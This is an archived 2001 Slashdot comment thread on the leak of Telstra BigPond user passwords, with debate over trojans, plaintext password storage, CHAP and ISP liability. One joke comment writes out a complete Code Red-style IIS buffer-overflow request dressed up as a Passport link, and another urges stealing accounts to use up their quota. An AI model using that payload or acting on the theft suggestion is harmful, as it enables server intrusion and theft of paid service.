Please create an account to participate in the Slashdot moderation system

 



Forgot your password?
typodupeerror
Check out the new SourceForge HTML5 internet speed test! No Flash necessary and runs on all devices. ×
The Internet

Telstra BigPond Passwords Leaked 97

Lord Cyric writes: "Telstra, DownUnder's biggest and baddest telco, has had a major security breach yesterday when a sample of its BigPond Internet password list was posted on various newsboards. The Australian Broadband Users Group (ABUG) has confirmed that this is not a hoax. This hack exposes the passwords for most of Telstra's Internet services (dialup, cable & ADSL). With all the bad press Telstra has been receiving lately over it's shoddy ADSL rollout and download caps, they certainly didn't need this ..." This site is not exactly the Telstra P.R. department.
This discussion has been archived. No new comments can be posted.

Telstra BigPond Passwords Leaked

Comments Filter:
  • I have a list, of IP's which have scaned my machine for an open sub7 server. There are only 3 or 4 in the last week or so. I dont think this is it.... Ive had countless other scans.. if someone wants this list, of all unwanted ports opened on my system in the last few weeks, just email me alanlee@r3nt0n.net
  • by Anonymous Coward on Saturday July 21, 2001 @11:13PM (#69522)
    I am a former employee of Telstra and I worked in their internal web development department. I have to say, as far as desktop PC's go, there's not any major security. People just come in fiddle with hardware and just leave.

    When someone has a problem they get person who looks good from 2 cubicles down to fix it and he/she just screwes up half the settings and services on the machine which compromise the security.

    Leave your housedoor open and intruders come in.

  • Lack of vigilance on the users' part? They got ALL the passwords and they're posting a SAMPLE of them. Unless you think everyone in Australia is too stupid to pick an unguessable password.

    How the fuck can it not be Telstra's fault?

    --

  • This is the funniest thing I've read on slashdot in quite some time...

    --

  • Not funny at all. People at work and friends (I work for an ISP) try to tell me their passwords all the time to fix some problem with their account. You just don't want to know, too much baggage comes with it. Same principle applies to any confidential data, if you can read someone's mailbox during system maintenance, don't, and do everything you can to make sure you never have to. Likewise, you should do everything you can to never have to ask users for their passwords to do something. Either have them type it in, somehow give you permissions to do whatever you need, or reset it and have them change it immediately afterwards. It's just prudent and covers your ass.

    --

  • by unitron ( 5733 ) on Sunday July 22, 2001 @12:45AM (#69526) Homepage Journal
    There seems to be a higher rate of crack-smoking moderators lately, but that's probably not related.
  • by hayden ( 9724 ) on Sunday July 22, 2001 @12:11AM (#69527)
    Before I start I'll just say I am a Bigpond Cable subscriber.

    With out more info there is no way of knowing if this is a crack or PEBCAK. It's entirely possible that this was done with social engineering or trojan(s), not a 1337 4ax0r. So far all that's known that 70 accounts were comprimised by some method.

    To put it in perspective, recently somebody sent an email to a large number Bigpond users pretending to be from Telstra asking them for their password and credit card number just so they could check their records. A depressing number of people replyed. We're not talking about the most security literate people in the world here.

    Telstra uses pretty much standard PPPoE for ADSL although they do use the ADSL modems that had the security problem a while back.

    We've also heard that Telstra has already caught the person responsible.

    BTW the "Australian Broadband Users Group" are widely regarded among Australian broadband users to be a bunch of self-important tools who are pretty much out to make themselves look big. The only guy who's worth listening to is they guy that runs www.whirlpool.net.au The rest are just dead weight.
  • I wonder how you order one of those in a bar?

    "A schooner of 4X please"

  • You should see the amount of network scans my poor linux box gets because it is on the ADSL network. My bet is that the network is a prime killing ground for idiot users, and the blame rests soley on Telstra. It would be almost trivial for them to stop 99% of there problems (can we say firewall..., block netbios ports,etc...).

  • More often the problem lies with management that won't allow the engineers to carry out best practices. This is because the best practices involve things that take extra time. Since the sales people usually commit product delivery often even before the development department ever heard of it, management gets really cranky about delivery times. Quality just goes out the window because that isn't what sales committed the company to.

    Let's rake some managers and marketers over the coals first.

  • If it was a decent system the hashes of the passwords would be stored, not the passwords themselves (encrypted or not)

  • Hopefully, events such as this will serve as a wake-up call to folks.

    Computer security is not a luxury to quickly become an afterthought.

    Security is the foundation that everything else should rest upon...
    ...which, most will agree, is not that difficult to do, if planned correctly, by the proper individuals...
  • > If it was a decent system the passwords would all be encrypted, and it would not allow insecure passwords.

    I keep seeing this sort of stuff - presumably refering to hashed passwords rather than encrypted. However there is a problem... if you use APOP or CHAP or similar the server end needs to have plaintext equivalent passwords on its end. Typically this means that the RADIUS servers have the plaintext passwords available. This is problematic - you would prefer to keep passwords hashed, but frankly its normally easier to nail down your RADIUS server than it is to nail down all the networking and other stuff to prevent sniffing of authentication sessions (and CHAP etc prevents those sniffs being useful).

    So don't assume plaintext passwords on authentication servers is necessarily a bad thing.
  • I spoke to a Telstra support guy a little earlier.

    He said that the account details were obtained by a trojan that claimed to remove the new 3GB/month cap on downloads. This would explain why it is only a few broadband accounts with the problem.

    Of course the problem is that they still haven't sent out a message to all the ADSL users warning them about this.
  • thank god i just changed to australia's other cable provider, optus :)

    Lucky you, living in Sydney/Melbourne/Brisbane. For those of us in other cities, it's Telstra or it's nothing -- and I'd rather burn my money than hand it over to those leprous scabs.
  • Even funnier, searching microsoft.com for code red worm or codered worm returns 0 results. Maybe they'll find in in another day or two.
  • The stolen passwords are worth quite a bit in the right hands. ADSL business users pay about AU$.20 per 1000kbyte. That turns out to be about US$100 per gigabyte or about 33x more than standard rates.
  • you haven't checked a modern cracking dictonary yet have you?
  • From what I can tell, if Telstra resets your password its to something like "adsl####". Someone told me that they pick a new password every day.

    Its also a real mess to change since theres broken software there too!

    Its just how things are done on the Information Super Outback!
  • by wct ( 45593 )
    This is 100% correct. Not only that, after they changed it, we were told we couldn't change it to something less obvious for a few days while they "worked out a few kinks".

    Telstra Bigpond has been unequivocally the WORST internet service I've ever used, of 4 ISP's tried.
  • FWIW I've been using linux too, rp-pppoe.

    But I'm guessing you don't live in Perth?
  • by wct ( 45593 ) on Saturday July 21, 2001 @11:54PM (#69542) Homepage
    As a BigPond ADSL user I have much to be thankful for. Thanks for the two-weeks downtime last month, changing the user agreement on download restrictions after the contract was signed, and forcing me to call every 4 days to reset my account when an authentication error on your end hangs the connection.

    But most of all, thanks for leaking the account passwords through poor security and having the foresight to keep the server down right now so I can't change mine.
  • by Velox_SwiftFox ( 57902 ) on Saturday July 21, 2001 @11:07PM (#69543)
    I prefer to not know user's passwords. If they forget them I replace the password with one thay have to change immediately, with automatic checking for crackable ones.
  • TransACT communications [transact.com.au], an ACTEW spinoff company, is laying the network infrastructure for fibre to the curb, which will carry traffic such as phone, internet and cable tv.

    Unfortunately, they don't plan to roll out to newer suburbs like mine at this stage, due to the underground powerlines..

    Might also point out that TransACT themselves do not provide internet service, and those that do provide it to TransACT customers (a whole 1 suburb at this stage, I think), provide it at a premium. There are links to ISP pricing on the TransACT site.

  • >Unfortunately, they don't plan to roll out to newer suburbs like mine at this stage, due to the underground powerlines..

    or even some older subburbs....which sucks...their planned coverage map shows Dunlop, Fraser, Latham and Flynn....but leaves a bloody great hole where Charnwood is....

    so it's Telstra ADSL for me....
    fortunately I'm not with them YET...not till friday...so i Know my username is safe....for now....heh..
  • Personally I don't care if telstra's state owned or not..I just want an alternative!....

  • People who don't know what ".exe" and ".vbs" mean are idiots? I've seen several slashdotters say that before, but I can't imagine why anyone would think that. Not everyone knows everything about their computers, and you shouldn't expect them to.
  • by szcx ( 81006 ) on Sunday July 22, 2001 @07:58AM (#69548)
    To be more accurate, they're blaming user stupidity. They're saying that a password-ripping trojan is responsible (which is entirely possible).

    From NineMSN [ninemsn.com.au];

    Telstra retail corporate affairs manager Stuart Gray said the virus, which operated on broadband users, collected the user names and passwords, automatically sending them back to the person who had activated the virus.

    "BigPond has not been hacked. What has happened is a Trojan virus has been lodged on a number of BigPond users," he told AAP tonight.

    Mr Gray said the hacker responsible had placed the user names and passwords of 69 BigPond customers on websites.

    BigPond had contacted the customers, changing their passwords and closing down their sites so other people couldn't use their names.

    The virus had been found on the websites of the customers contacted.

    "It's a real warning for broadband customers how important it is for them to have the latest anti-virus software and firewall software and protect themselves as much as possible," he said.

    Telstra is evil, but this looks more like the work of idiot users.

    Keep the pitchfork and flaming torches handy though, they'll fuck up sooner or later.

  • Another bad thing about the Telstra passwords is that they don't use any SSL to cover any of the access to subscribers' info. Therefore it just might be that the passwords were obtained from the net in transit - not necessarily from an in-situ source. At least, they don't use any SSL when I'm using my accounts, for which I've just changed my passwords, of course.

    city: Adelaide, South Australia
  • by Bryan_Crowl ( 87192 ) on Saturday July 21, 2001 @11:05PM (#69550) Homepage
    with only 3 gigs a month (upstream and down) the adsl and cable *unlimited* accounts are just about useless. Maybe this will force someone in the Government (who still own 51% of telstra) to do something.

  • by benk ( 93688 )
    The recent rise in cracking in the last couple of months is probably a result of US summer holidays... But Telstra doesn't make it hard for wannabes - when I recently changed my password, it required: 8 letters max, only from charsets [az][AZ], numbers and _ Not brilliant for security...
  • by bonoboy ( 98001 ) on Sunday July 22, 2001 @12:20AM (#69552) Homepage Journal

    Telstra's claiming that the 96 passwords published represented the entire list, not a sample. They've cancelled all the accounts concerned and re-provisioned (translation: re-generated random passwords) and contacted everyone concerned. They're saying it was the result of a trojan, which they've found installed on every one of the users' devices.

    On some of the Australian mailing lists, we've had individuals claiming that whatever it is, it must be Telstra's fault. Come on, they're not particularly nice guys as far as responsible corporations go, but poor security must be the fault of the software vendors and lack of vigilance on the users' parts.

    Just trying to install some sanity before all of this stuff gets repeated here once again....

  • Yeah, they decided to send the plaintext password over the wire instead. Yeah, that'll work. Not.

    Bob, the reason is that the CHAP authentication protocol requires that the server know the plaintext password.

    Just keeping a hash isn't good enough.

    The requirement for plaintext passwords is a drawback for many challenge-response protocols. You trade-off the value of never sending the password over the net (instead using challenge-response) with having to store the actual password on the server (instead of the result of a one-way hash).

    Encrypting the passwords doesn't help. If the authentication program needs the plaintext value it must be able to decrypt the password, so the attacker simply steals the encrypted passwords and a memory-dump of the executing decryptor program.

  • Does anyone else notice a higher-than-normal cracking rate this past month/2 months?
  • MOD THIS UP!!!!! +1 Informative!!!!!

    <coughs>


    ---
  • Irrespective of where fault lies, anyone not familiar with Australia should realise that "Telstra Bashing" is virtually a national sport, and typically involves a lack of objectivity. This usually clouds any issue involving the company.
  • I don't see why more sites don't use SSL for just general day-to-day surfing. Certificates are too expensive and difficult to get for smaller web sites, but in my opinion larger websites who HAVE certificates for their existing 'secure' functions, should just direct people to SSL for ALL data transfer...i mean, why not? Might as well take advantage of the technology, instead of making your whole site unencrypted apart from a single account info / credit card billing section.
  • Name of Plan: Freedom Plan - What???? how come there are different types of freedom (ie Standard and Deluxe - freedom in Capping up/down stream transfer rates and enforcing 3 gigs limit, come'on Telstra! Advantage of Telstra's ADSL (quoted from web page): "Convenient - ....As soon as you turn on your PC, you can be online...." - Urm *BRRRR*... network outages I have experienced within the past month is shocking! Did someone forget to power-cycle the systems today?!? Telstra's Corporate Slogan: "Making Life Easier" - NOT Hope things change in the future.
  • This Sydney Morning Herald article [smh.com.au] quotes a Telstra manager, confirming the logins were stolen from user systems with a trojan (after all, the Telstra authentication client stores them in plaintext), not from BigPond servers.
    • "BigPond has not been hacked. What has happened is a Trojan virus has been lodged on a number of BigPond users," Mr Gray said. ... The virus had been found on the sites of the affected customers.

    My BigPond Cable-connected system regularly gets portscanned by other cable/DSL users. This seems to be just a lot of FUD caused by the deceptions of script kiddie. Telstra don't do anything to protect their users systems from attack, but then how many other ISPs do?

  • by wolvie_ ( 135527 ) on Saturday July 21, 2001 @11:59PM (#69560)
    The Australian Broadband Users Group (ABUG) has confirmed that this is not a hoax.

    What? The site which originally broke the story [core.org.au] (CORE [core.org.au]) have now posted another article saying Telstra's servers were probably not cracked [core.org.au]. Specifically:

    Sub7 or some other "netbus" program has been used to leech the accounts of the users machines. This is at the moment the scenario I favour...

    Sure, Telstra fucked up their ADSL network and extremely pissed off many users with their download caps, but there isn't proof yet that they screwed up on this too.

  • Telstra is in an interesting situation in Australia. It used to be a wholly government owned corporation, which was the only telco in aus. Through deregulation + the rise of ISPs + cable tv services and other factors, there are now many telcos and ISPs. As far as Broadband is concerned, Cable and xDSL are both available. xDSL is being offered by Telstra and a few other lesser known ISPs. Cable is available from Telstra and Optus. Coverage rates aren't that great, and through interesting circumstances, only suburbs with above-ground wiring are able to access Optus. Telstra therefore has an effective monopoly in certain areas, and can pretty well do as they please. Even in areas where both carriers are available, the duopoly forces mean that if Telstra can get away with it, Optus will do it too.
  • We don't have to *buy* it back. We can *take* it back without paying. Check all the details associated with the way it was privatised. There's a clause to the effect of "any time in the future telstra can be reclaimed"
  • As a resident of Australia, this doesn't come as a big suprise to me. Ever since the Liberal government decided that selling off Telstra would actually be a *good* idea, the service has just gone completely downhill. Of course, in some ways it was never great to begin with but privatising it just makes it worse.

    The point that successive governments (state and federal) don't understand is when you privatise a service, you change whatever the service is responsible to. Public-sector services are responsible to the government, who are in turn responsible (at least, they used to be) to the people. Politicians can be very sensitive to voter dissatisfaction (so the theory goes), especially around election times. But when you privatise the service, it becomes a private-sector entity whose responsibility is to the shareholders, not the people. Profits become the primary focus, and the quality of service declines. Witness such effects with the electricity and natural gas industries in Australia, and the electrical industry in California (the one currently being bailed out with taxpayers' money). What's worse is that as Telstra, being the government body in charge of telecommunications, was the one that set up and maintained all the infrastructure (phone lines etc). This puts them in a wonderful monopoly position as they own practically most of the telecommunications infrastructure in Australia (Optus has some infrastructure of their own as well as leasing from Telstra), and therefore can effectively charge what they like. Not only do the customers pay high prices for inferior service from Telstra, they have to pay high prices to Telstra's competitors because Telstra also charges high prices for them to use their network.

    Telstra should have never been privatised to begin with. It was a simple election ploy for little Johnny Howard so that he would have some money to throw around, a way to buy votes. The Liberal government will spend the money on grand election promises and when they are voted out (it's only a matter of time, really) they will leave the successive Labor government with a dilemma. Raise income taxes/GST or sell off Telstra completely (the latter being the most likely). The sad reality of this is that while Telstra is responisble to the shareholders, the "mum-and-dad" shareholders that were meant to be the main beneficiaries of the sale hold precious little stock and can do absolutely nothing to influence the way the company is run.

    The same Liberal government that sold Telstra is also unable (more likely they are unwilling) to send in the ACCC (Australian Competition and Consumer Commission, the same people who said "no thank you" to DVD regional zoning [slashdot.org]) and put the hard word on Telstra to improve their service. So, to be honest, this whole sorry saga has been an ill-conceived, money-motivated botch from the word go. Unless we either send in the ACCC and try to get some real results, or buy back the 51% of Telstra already sold (and pay for it later through higher national debt), this situation is unlikely to change.

    Self Bias Resistor

  • this is why I don't use the same password on anything I want to keep a secret. think of the fun some 11 year old will have using google to serach for a username pulled off the list and finding another comapany that the DSL client uses and loging in using the same password off of the list. say I used "slashdoter" as my DSL account name, you just plug Slashdoter into google and the second hit is my user page on slashdot. Everytime this happens the company comes out and says change your password! but then never say change ALL your passwords that relate to the creacked one.

    I just can't wait for hailstorm and .net, atleast now it's a two step prosses to hack my life, al la The Net.

  • If you believe the hype... and look at the small (I have found 37!!!) collection of trojans that are readily encountered when investigating "3l33t h4X0r t00Lz"... The carefully constructed password lists are actually the result of trojan infection of (There is no silent L in)users systems. Course, Telstra themselves are inferring this, which leads me to assume it is not true... unfortunately it SOUNDS true... either way, my box is happily changing my ADSL password randomly at wildly variable intervals just in case :) Ok, I felt the need to write a silly script and why do *I* need to know my login password if my box does??? :)

    I realise that this information may have been posted earlier and, indeed, in a more ledgible and less commaed fashion, but I couldnt be bothered checking... :)

    Have an otherwise normal day,
    err!
    jak.
    ---
    "A man who has to be chained to a bed has issues."
    David Eddings.
  • Um, that means that a cracker only needs to try 9999 combinations. You can also rule out a lot of the low-entropy ones, like 00-fi-ln-00 and 12-fi-ln-34. That leaves you with an even smaller list of probables.

    A dictionary attack would probably use a dictionary 5 or 10 times that size, and wouldn't take all that much time to run. A 500 Mhz system can process a lot of ~12 character strings in an hour.

    I strongly suggest you try a different scheme.

    --

  • by rneches ( 160120 ) on Saturday July 21, 2001 @11:10PM (#69567) Homepage
    Does the law in Australia allow companies to be held liable for breaches in security? It seems to me that it would be bad faith at the very least. On the other hand, I can't think of an example where a company
    • had crappy security
    • got hacked, hurting their users and customers in a tangable way
    • were sued by thier customers
    • lost/settled with their customers
    As far as I can tell, the hackers are the ones considered culpable, not the incompitant admins who let them in. Is there a legal basis for this, or is it just the way things work? Or am I being paranoid?

    --

  • Apparently, Telstra is not to blame for this, it was caused by Trojen/sub7 viruses installed on client computers, since there was only 69 users effected (accounts have been disabled/fixed etc so dont bother trying to use the u/p if you find them, its not hard to find the list online.) this effected mainly ADSL users, but also a few dialup & cable users were effected aswell, also pushing the fact that it was a virus and infact nothing to blame of telstra, its very un-likely that ALL services of bigpong would have passwords cracked.. some git has mearly picked out the bigpond users & passwords in order to make telstra look to blame my 2 cents.. Adam
  • ...is ANYONE storing PLAINTEXT passowords ANYWHERE? There's just no reason for that.

    The people at AT&T figured this one out 32 years ago!

    I hope that the company is held responsible for this. It's not completely the fault of the "hacker" who posted the passwords!

  • Why should my freedoms be blocked because most users are idiots? Frankly, I want those ports open. I use them lots, for legitimate purposes. For real. I dont want my ISP restricting my access because my neighbor thought that "Free Pr0n Dialer and Locater.vbs" file was for real.

    The answer, if indeed this was a socially engineered attack, is not to freeking destroy the freedoms of all users, but rather, educate the morons.
  • Yeah, difference is that shooting someone in the head is not equal to infecting your own computer with a virus. BIG difference, wouldn't you say?
  • There is no law of criminal negligence with regard to security AFAIK. But if you lose something or are harmed as a result of a security breach (and that could include the loss of private/personal information), you could pursue them under the civil law of negligence, I would imagine.
  • So what are you saying? That we entrust our money into the banks' safekeeping, but they have no legal responsibility whatsoever to keep it safe? That's ridiculous (IMHO). Banks aren't liable for bank robberies because they take reasonable care to ensure that your money's safe. That doesn't mean it's totally safe, but they've done everything reasonable to keep it safe.
  • On Telstra's side is a lot of money and for some users the fact that outage didn't "cost" them much.

    "Loss" is an interesting question in this case. If some 31337 h4x0r uses up my download quota (which I've paid for), that would count as loss. If I have to do a security audit, or take other corrective measures to counter the risks that sensitive information should now be considered to be in the public domain, then the cost of those measures would count as loss as well. But I imagine their exclusion clauses would exempt them from common law liability (Telstra would be stupid if they didn't do that), so the question is moot.

  • by ckedge ( 192996 ) on Sunday July 22, 2001 @06:19AM (#69575) Journal

    Allright, I'll bite.

    What specific circumstances does "changing passwords regularly" protect against?

    Assume that my passwords are all "very strong", they are not written down anywhere, and they're never transmitted in the clear over an un-secure network.

    The only circumstance I can forsee this "helping" with (besides idiotic ones like people loosing the pices of paper they have their passwords written on), is where it's already in the hands of a "criminal". But AFAIK if someone already has a single user account, further user accounts (existing and specially-created) and the root account isn't far behind.

    Can anyone point me to a scholarly analysis of the exact merits of regular password changing?

    Why? Because I don't do it. If I were, with 20 different passwords and all of them of the "Strong" type, I'd be forced to write them down, or spend hours and hours figuring out 'mind games' to try and remember them, and even worse it would (and did in past years) result in an ever increasing number of "confused and forgotten" passwords. (Frequently occurs within 1-2 weeks of a change, when you just happened to not use that account, and so now you're mind is groping in among not only all your current passwords but the previous 1-3 rounds of passwords, and suddenly you're screwed. No fun.)

  • because if you go over 3gigs a month, you pay per meg.. so this could get really quite nasty.

    thank god i just changed to australia's other cable provider, optus :)

    (along with all my phones/mobiles/etc... telstra is losing $100au/month from me now :p)
  • I still think that most vbs/exe backdoors and trojans are downloaded through filesharing programs and with the advent of programs that respond with "your search.exe/vbs" there is going to be a lot more idiot exposing...
  • Note that /. 's passwords are/were stored in plaintext. This was why the breakin was so annoying. Everybody had to increment the number after their password by 1.

    - Ando
    You are the weakest link, goodbye.
  • haven't looked anything up about it, as I don't live there, but they're doing some strange kind of deal with cable and free phone calls, ACT Electricity and Water are doing it... ACTEW...

    anyone heard anything else about it?

  • Another bad thing about the Telstra passwords is that they don't use any SSL to cover any of the access to subscribers' info

    Eh? Telstra.com [telstra.com] and BigPond Home [bigpond.com] use SSL when you login to account info. It would be very strange if BigPond Advance didn't.

    Oh ... wait. This _is_ Telstra after all ... Who knows with those tossers.

  • Hey, if that's all you get for your hard earned cash, what better way to even the score with the fascist telco than by stealing an account and sucking it dry? Lather, rinse, repeat.
  • I think this moderator system is broken or something. I got some points and drop down boxes but appparently don't have any way to submit potential moderations. I would have dropped a point. I though it was pretty funny, too.
  • People who don't know that pointing a gun at their head and pulling the trigger is a bad thing are idiots? I've seen several slashdotters say that before, but I can't imagine why anyone would think that. Not everyone knows everything about their guns, and you shouldn't expect them to.

  • I know something similar to this gets posted in nearly every discussion of passwords, but here's a simple way to generate fairly strong passwords that you can remember, so you can stop worrying about how hard it is to remember your strong passwords and change them regularly:

    1. Flip open the Bible, or the complete works of Shakespeare, or similar, to random page, random line. Read the phrase on said page and line.
    2. Commit that phrase to memory.
    3. Now 1337ify the phrase. "To be or not to be" becomes fairly-strong password "70b30rN0770b3" (granted it repeats a lot of characters, but you get the idea). Flipped open John 3:16? "ph0r60d$010v3d7h3W0r1d" seems strong to me.
    If you stay suitably random in your replacement of letters with symbols and your switching of lower-case for capitals, you'll avoid normal English distribution of characters (which might otherwise be a problem), and you'll have a fairly strong, easy-to-remember password.

    In addition, this system can be safely posted here and used by anyone who likes it, because the important part of the system is the book used, not the process (think cryptosystems - publish your algorithm, keep the key secret). Just don't use the same book consistently, and it should be secure and easy.

    And of course, it uses script-kiddie-speak to hold off script kiddies, so it's poetic justice of a sort, too...

  • I don't use that particular system myself, but as far as producing a so-called "strong" password (i.e., not a dictionary word, contains both cases of letters, contains numbers/symbols, decent length), it does an OK job for non-critical stuff (I used to use it to generate my webmail and college LAN passwords when I needed to change those) - oh, I need a password, grab a book off the shelf, OK, got one. If you want to go off on a simple system because it's not perfect, feel free; pretty much anything can be cracked given time, resources, and ingenuity - when I need real security, I unplug the network cable from the wall. Unless the script kiddie is going to physically break into my room, I figure that'll make it hard for him to r00t my box...

    And I admit, the system I outlined isn't perfect; it's decent at best. The replacement of letters and numbers in 1337 is variable enough that it makes it a chore to develop an effective dictionary; I don't doubt it could be done, though. The question is whether it's worth it; vary the methods of replacement of characters and you could quickly make it almost easier to just use brute-force methods. In addition, the "key" is changing for every password generated. If you devote enough time to the effort, you could crack it, but that's true of anything. The guy was complaining about having to remember all those "strong" passwords - well, this generates decent ones that you can remember. If you want to make them stronger, just apply the same principle, but use different methods (and by that I don't mean rot13 the phrase, either). I typically produce passwords by generating a set of transformations to apply to a given input, and they vary in type and number. But the basic idea is about as sound as a password "system" can be. I end up with unrecognizable strings that I'm able to remember fairly easily, but which are also fairly strong.

  • by 0x00 ( 224127 ) on Saturday July 21, 2001 @11:20PM (#69586)
    This [apcmag.com] is the forum where the usernames were posted. Apparently it only affects teltra bigbond ADSL users.
    --
    0x00
    l33t cl0wnZ
  • by James Foster ( 226728 ) on Saturday July 21, 2001 @11:15PM (#69587)
    As you can read here [atomicmpc.com.au] Telstra are in fact denying any crack taking place. They're blaming it on the users!
  • I was the one that first notified telstra about the list and all that jaz after the guy/group (oxyg3n) submitted the list as a story on my site.

    Then the story made it to broadband.org.au [broadband.org.au] and then to whirlpool (link in /. article).

    Now I have put the latest article [core.org.au] up on my site [core.org.au] to put some facts back into this thread. No-one can prove that a Bigpond Account server was hacked - what we know is that 69 user account passwords from what predominantly appear to be to be the much troubled Telstra ADSL service have been posted on a number of sites. Just how these passwords were gathered is subject to wild speculation.

    The case for a Account server failure
    Most (if not all) of the accounts seem to be ADSL accounts - a Trojan should not be so selective (but it could be). There have been a LOT of troubles on the ADSL network - it is not inconceivable that something slipped hough the cracks (if just temporarily).

    The case against
    69 passwords are wayyyy to few to consitute a large hack - all the posted lists where the same. Once posted these accounts would become useless to the cracker(s) - but not if he/she/they had access to the accounts via remote control clients.

    The fact remains that unless one of the affected accounts tells us that they were infected with one of those trojans or Telstra comes clean on the whole thing (hahahaha!) we remain guessing. I'll keep my site up-to-date with the info as I get it.
    --

  • first fucking post again!!! I fucking kick ass. anyways, I like to jerk off

    First post is even more impressive now that we know that you typed it with only one hand!

  • I have a minor nitpick: referring to Australia as "relatively non-ligitious" [sic]. I've heard that this is a fallacy, and that Australia actually has more lawsuits per capita than the USA (which is considered by most Australians as being far more litigious).

    As far as the rest of your post goes, I think it is right on the mark (but IANAL). Negligence involves not taking reasonable precautions against events which could be damaging to others. Whether these events involve a third party breaking the law or not is irrelevant.

  • DO you know what is scarier ? Lemme tell you a little about my cable provider, Virtua [virtua.com.br], here in Brazil.
    4Gig/month, lots of filters (basic service ports, like 80/tcp, 21/tcp etc), including a filter that block any protocol that is not TCP, UDP or ICMP.
    But do you want to know what is even worst ? There are no competitors. This is the only Cable provider in the whole state. So, I have to stick with it.
    Guess how much I have to pay for a 128Kbits (thats right, 128K cable) ? Something like US$40/month. Plus the Cable TV signature (which we must have to have the cable access), which is something like US$35/month.
    Wonderful ...
    ---
  • 0h t3h h0rr0r!
  • Okay!

    Knock knock.
    Who's there?
    Orange.
    Orange who?
    Orange I lame joke-maker?


    Is that better? :)

  • ... The passwords getting out could have been prevented by using strong encryption.

    Or, if nothing else, encryption could have delayed the attackers getting the list...

  • by Scoria ( 264473 ) <slashmailNO@SPAMinitialized.org> on Sunday July 22, 2001 @12:48AM (#69595) Homepage
    I forgot:

    The proper encryption method would be double ROT13. Then they could sue under the DMC... wait, too bad Australia isn't the the United States, eh Telstra? ::sigh::

  • Wow... Someone just picked up the new copy of 2600 w/ the article on Password Authentication

    --- My Karma is bigger than your...
    ------ This sentence no verb
  • Maybe mthis is becoming a recurring theme for me, but it seems that those companies who actually engineer their products rather than simply cobbling them together from a variety of bits and pieces have fewer problems of this sort.

    Someday the virtues of engineering best practices, and, dare I say it, even formal methods and correctness proofs, will be apparent to all. Ask yourself: why do we require the designers of our septic systems to have engineering licenses, but don't require the same from those who write the software that controls significant parts of our information infrastructure?

  • Bottom line: the COMPANY puts out the product. The engineers have their hands tied in some instances, but the company as a whole puts its name on the product and releases it. Professional architects do not let managers make decisions that affect the structural integrity of the buildings they design. Sofdtware engineers must do the same. It is incumbent on the engineers to educate the managers and take the necessary steps to encourage best practices.
  • Has anyone else noticed that the links in the 'bigpond' area on the telstra.com homepage do not work? It has been 3 months since I signed up and they have have never worked for me.

    More amusing is when the guy came out to hook us up, the entire 'bigpond' section was missing. He had to make calls to their helpdesk to find out how to change our initial password. Apparently this is normal practice to remove entire sections rather than publish problems...

    Important Note for Telstra Shareholders: The all billing links still function :)
  • They do block the netbios ports.
  • The first lesson that Tesltra should take from this incident is that unlimited DSL is a user right. Ignore that fact at your own risk.

    Are you drunk, stoned or just insane? What right do you have to unlimited DSL? I mean you don't even have the 'right' to a roof over your head, daily meals etc, and you are spouting off about 'unlimited DSL'.

    Tool.

  • luckily telstra has embraced the obvious future of authentication on the internet and decided on a unilateral capitulation to microsoft's passport service. resistance is futile! duh!

    all of their subscribers have been sent an email saying to get a new user name and password by just sending the following simple http request to www.passport.com ;-)

    GET /default.ida? NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801% u9090%u6858%ucbd3%u7801%u9090%u6858%uc bd3%u7801% u9090%u9090%u8190%u00c3%u0003%u8b00%u531 b%u53ff% u0078%u0000%u00=a HTTP/1.0
  • Did timothy all of a sudden become the only one to post stories? Did he go on a killing spree?

    grin

    Reb
  • The weblog I'm working on (geeklog [geeklog.org]) does a MD5 the password, and records the MD5 against the username. This seems to work very well. Any (rational) reason this woundn't work with Telstra also? Is this method as good as I think it is, or am I missing something?

    And I just joined them, due to OneNet falling by the wayside. I only wish I had the choice for Optus, but living in Adelaide provides a rather limited subset of options. Hell, we don't even have the Cable option over here! And word has it from a very reliable source in Optus that they simply arn't willing to roll out in Adelaide due to financial reasons.

    I did a google check against my username, and it didn't show up there ... which is a good thing.

    --
    McCarrum!

  • Actually, at most you change the password for the things you normally use. The obscure sites you registered for and have forgotten about....
  • How 'bout a right to keep and bear arms? Bare arms are, in fact, short sleeved shirts.
  • There is a difference.

    Banks are insured. If they are robbed, customers are not affected, except those who were personally at the scene. Banks assume that there will be problems.

    OTOH, if someone gets my account details from the bank, in any manner, and then proceeds to use my account, then I expect the bank to fully protect me from any consequences of their poor security, and failure to do so would be grounds for a lawsuit.

    Likewise, if someone gets my bigpond account details, they may able to use them to do damage both to me personally and by masquerading as me. It is the ISP's job to ensure that this does not happen, and I expect to be fully protected from any consequences of someone gaining my details from my ISP. Failure to do so could well be grounds for a lawsuit, even in the relatively non-ligitious Australia.

    Storing username/password lists in plaintext anywhere definitely falls under insufficient security. In fact, the password should only be stored as a one-way cypher, so that I *can't* ring up, give my details and be told my password, but instead simply have it reset to a known password which I can then change immediately.
  • I've been using mine on Linux, and have had none of these problems.
  • I haven't had many problems with Telstra Bigpond at all. I run it on Linux, with Roaring Penguin PPPoE and it works most of the time. The only time I have seen problems is when trawlers pull up their cables. The 3 gig limit is annoying, but I can survive until they increase it.

    David

  • No, I'm in Brisbane.

  • You know why there are only 69 accounts hacked? Its because there are approximately 69 people left using Tel$tra's ADSL plan :) They all left after the implementatioon of the 3gb CAP. For all those non-aussies out there think of Tel$tra as a cross breed between Microsoft (but 1000 times more agressive) & The Communist Party.
  • I can't count how many times these companies have told me to change my passwords regularly for security. But hell, I'm not worried about my roommate staring over my shoulder everyday as I sign on to AIM. If my ISP can't beef up it's security to keep my password from hackers then I can't put up much of a fight now can I?

  • If it was a decent system the passwords would all be encrypted, and it would not allow insecure passwords.

    Throw in caps, a number and a bit of punctuation and you won't be getting anywhere fast. 95^8 = 6634204312890625 possible passwords.

    However, having users use all possible chars might not be practical.

    Let's say we limit ourselves to [A-Z][a-z][0-9], and a length of at least 6 chars: 62^6 = 56800235584

    On your average 1GHz x86 based system you can expect about 60K attempts a second. About 10957 days, 30 years.

    It all boils down to humans though. They forget passwords, simple as that. You need something secure, but which won't swap your tech support centre with calls. Though imagine all the work they'll need to do now, contacting all the users and getting them to choose (or assigning) new passwords.

